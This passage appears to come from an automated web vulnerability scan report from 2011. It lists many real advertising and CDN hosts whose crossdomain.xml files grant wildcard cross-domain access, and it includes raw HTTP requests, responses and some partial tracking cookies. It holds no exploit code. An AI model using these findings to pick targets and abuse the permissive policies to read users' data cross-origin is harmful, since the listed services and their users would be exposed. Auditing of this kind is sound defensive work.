HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:45:58 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 03 Feb 2011 17:27:56 GMT ETag: "a88001-199-49b64160f9f00 Accept-Ranges: bytes Content-Length: 409 Content-Type: text/xml Cache-Control: private, max-age=31536000 Age: 17664036 Expires: Sat, 11 Feb 2012 14:05:22 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="*" to-ports="80,443"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.turn.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Pragma: private Content-Type: text/xml;charset=UTF-8 Cache-Control: private, max-age=0 Expires: Sun, 04 Sep 2011 01:06:31 GMT Date: Sun, 04 Sep 2011 01:06:31 GMT Content-Length: 100 Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.visibleme |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: cdn.visiblemeasures.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache ETag: "49e4e5b932ff87fda57 Last-Modified: Wed, 03 Mar 2010 02:48:52 GMT Accept-Ranges: bytes Content-Length: 141 Content-Type: application/xml Date: Sun, 04 Sep 2011 01:10:41 GMT Connection: close <cross-domain-policy> <allow-access-from domain="*" /> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | https://cdns.gigya.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdns.gigya.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT ETag: "80b2ea66b4efcb1:0" Server: Microsoft-IIS/7.5 X-Server: web102 Cache-Control: max-age=86400 Date: Sun, 04 Sep 2011 01:22:14 GMT Content-Length: 355 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://clk.fetchback.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: clk.fetchback.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:17 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-do ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://companion.adap.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: companion.adap.tv |
HTTP/1.1 200 OK Server: adaptv/1.0 Content-Type: text/xml Connection: close Content-Length: 194 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia |
Severity: | High |
Confidence: | Certain |
Host: | http://control.adap.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Content-Type: text/xml Connection: Keep-Alive Content-Length: 194 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia |
Severity: | High |
Confidence: | Certain |
Host: | http://d3fd89.r.axf8.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d3fd89.r.axf8.net |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT Accept-Ranges: bytes ETag: "56b3a475ee27cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 00:58:59 GMT Connection: close Content-Length: 153 <?xml version="1.0"?> <!-- http://www.adobe.com <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://external.ak.fbcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: external.ak.fbcdn.net |
HTTP/1.0 200 OK Server: Apache ETag: "a27e344a618640558cd Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Date: Sun, 04 Sep 2011 01:13:06 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://findnsave.sacbee |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: findnsave.sacbee.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 15 Dec 2009 23:03:45 GMT Accept-Ranges: bytes ETag: "ed84bfdada7dca1:0" Server: Microsoft-IIS/7.5 X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com X-ManagedFusion-Rewriter X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com X-ManagedFusion-Rewriter X-Powered-By: ASP.NET X-Server-Name: FS1 Date: Sun, 04 Sep 2011 01:22:28 GMT Connection: close Content-Length: 221 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> < ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gannett.gcion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: gannett.gcion.com |
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/xml Content-Length: 111 <?xml version="1.0" ?><cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://goku.brightcove |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: goku.brightcove.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:12:45 GMT Server: Apache Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT Content-Length: 116 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://gscounters.gigya |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: gscounters.gigya.com |
HTTP/1.1 200 OK Content-Length: 341 Content-Type: text/xml Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT Accept-Ranges: bytes ETag: "c717c7c65530ca1:2dc1" Server: Microsoft-IIS/6.0 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" x-server: web201 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 00:44:37 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://i.w55c.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: i.w55c.net |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:06:47 GMT Server: Jetty(6.1.22) Cache-Control: max-age=86400 Content-Length: 488 content-type: application/xml Via: 1.1 bfi061002 (MII-APC/2.1) Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" to-ports="*"/> <site-control ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120 Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://imp.fetchback.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: imp.fetchback.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:45:18 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-do ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://init.lingospot.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: init.lingospot.com |
HTTP/1.0 200 OK P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: max-age=7200 Content-Type: text/xml Etag: "-5d35a762ba6b2244" Last-Modified: Sun, 04 Sep 2011 00:58:31 GMT Vary: Accept-Encoding Date: Sun, 04 Sep 2011 00:58:31 GMT Server: Google Frontend <cross-domain-policy> <allow-access-from domain="*"/> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: js.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Sun, 04 Sep 2011 00:42:17 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://load.exelator.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: load.exelator.com Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/xml Accept-Ranges: bytes ETag: "3801752829" Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT Content-Length: 148 Date: Sun, 04 Sep 2011 01:10:56 GMT Server: HTTP server Connection: Keep-alive Keep-Alive: timeout=15, max=100 Via: 1.1 AN-AMP_TM uproxy-3 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" to-ports="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://load.tubemogul.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: load.tubemogul.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"-1-1313195660000" Last-Modified: Sat, 13 Aug 2011 00:34:20 GMT host: rcv-srv34 Content-Type: application/xml Content-Length: 204 Date: Sun, 04 Sep 2011 01:17:21 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://log.adap.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: log.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.0 200 OK Content-Type: application/xml Connection: Keep-Alive Content-Length: 204 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.sprint.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.sprint.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:53:11 GMT Server: Omniture DC/2.0.0 xserver: www372 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://motifcdn2 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: motifcdn2.doubleclick.net Proxy-Connection: keep-alive Referer: http://s0.2mdn.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=229b025847010047||t |
HTTP/1.1 200 OK Server: Apache ETag: "adb6a2c1ae7705ddf15 Last-Modified: Tue, 30 Sep 2008 22:30:52 GMT Accept-Ranges: bytes Content-Type: application/xml Vary: Accept-Encoding Content-Length: 339 Date: Sun, 04 Sep 2011 00:43:58 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nmcharlotte.112 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nmcharlotte.112.2o7.net |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:06:26 GMT Server: Omniture DC/2.0.0 xserver: www28 Content-Length: 137 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://odb.outbrain.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: odb.outbrain.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"201-1311068652000" Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT Content-Type: application/xml Content-Length: 201 Date: Sun, 04 Sep 2011 00:44:38 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://p.brilig.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: p.brilig.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:53:15 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Tue, 19 Jul 2011 01:45:29 GMT ETag: "55fb1-ab-4a86245412040" Accept-Ranges: bytes Content-Length: 171 X-Brilig-D: D=75 P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Connection: close Content-Type: application/xml <?xml version="1.0" ?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://paid.outbrain.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: paid.outbrain.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"201-1311068652000" Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT Content-Type: application/xml Content-Length: 201 Date: Sun, 04 Sep 2011 01:23:10 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pbid.pro-market |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: pbid.pro-market.net Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC" ANServer: app2.ny ETag: W/"207-1312809562000" Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT Content-Type: application/xml Content-Length: 207 Date: Sun, 04 Sep 2011 01:10:59 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pix04.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Sun, 04 Sep 2011 00:42:16 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Sun, 04 Sep 2011 01:05:06 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com |
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Mon, 05 Sep 2011 00:45:10 GMT Content-Type: text/xml Content-Length: 207 Date: Sun, 04 Sep 2011 00:45:10 GMT Server: QS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://premium.mookie1 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: premium.mookie1.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:50:03 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT ETag: "d4820b-d0-48821fe531a40" Accept-Ranges: bytes Content-Length: 208 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://qlog.adap.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: qlog.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: adaptv_unique_user_cookie |
HTTP/1.0 200 OK Content-Type: application/xml Connection: Keep-Alive Content-Length: 204 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: r.turn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Sun, 04 Sep 2011 01:06:01 GMT Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 01:06:00 GMT Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://rcv-srv48.inplay |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rcv-srv48.inplay |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"-1-1314384909000" Last-Modified: Fri, 26 Aug 2011 18:55:09 GMT host: rcv-srv48 Content-Type: application/xml Content-Length: 204 Date: Sun, 04 Sep 2011 01:28:49 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://receive.inplay |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: receive.inplay.tubemogul Proxy-Connection: keep-alive Referer: http://c.brightcove.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _tmid=-5675633421699 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"-1-1314196443000" Last-Modified: Wed, 24 Aug 2011 14:34:03 GMT host: rcv-srv17 Content-Type: application/xml Content-Length: 204 Date: Sun, 04 Sep 2011 01:17:50 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://redir.adap.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: redir.adap.tv |
HTTP/1.0 200 OK Server: Apache ETag: "6c4eab00cd774ab5a7c Last-Modified: Thu, 01 Sep 2011 18:18:30 GMT Accept-Ranges: bytes Content-Length: 207 Content-Type: application/xml Date: Sun, 04 Sep 2011 01:05:28 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 03 Sep 2011 23:16:31 GMT Expires: Fri, 02 Sep 2011 23:16:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 5295 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s3.cinesport.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s3.cinesport.com |
HTTP/1.1 200 OK x-amz-id-2: HJPWt1++478t1MkKTXsR x-amz-request-id: 832C78F5B320E530 Date: Sun, 04 Sep 2011 01:03:57 GMT x-amz-meta-s3fox-filesize x-amz-meta-s3fox Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT ETag: "199ac761aefc6dd7852 Accept-Ranges: bytes Content-Type: text/xml Content-Length: 204 Connection: keep-alive Server: AmazonS3 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-pol ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://search.spotxchange |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: search.spotxchange.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:23:45 GMT Server: Apache Last-Modified: Mon, 28 Feb 2011 23:42:39 GMT ETag: "c41e69-8b-4d6c32ef" Accept-Ranges: bytes Content-Length: 139 Connection: close Content-Type: application/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Server: nginx Date: Sun, 04 Sep 2011 00:52:32 GMT Content-Type: text/xml Content-Length: 268 Last-Modified: Wed, 14 May 2008 01:55:09 GMT Connection: close Expires: Sun, 11 Sep 2011 00:52:32 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <site-control permi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://segments.adap.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: segments.adap.tv |
HTTP/1.0 200 OK Content-Type: application/xml Connection: close Content-Length: 204 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://simg.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: simg.zedo.com |
HTTP/1.0 200 OK Age: 0 Content-Type: application/xml Date: Sun, 04 Sep 2011 01:05:11 GMT Edge-Control: dca=esi ETag: "32e623-f7-44d91a42f42c0" Last-Modified: Mon, 19 May 2008 09:03:47 GMT P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Server: ZEDO 3G Content-Length: 247 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://socialize.gigya |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: socialize.gigya.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT Accept-Ranges: bytes ETag: "c717c7c65530ca1:0" Server: Microsoft-IIS/7.5 X-Server: web503 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" Date: Sun, 04 Sep 2011 01:24:16 GMT Connection: close Content-Length: 341 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sprint.tt.omtrdc |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sprint.tt.omtrdc.net |
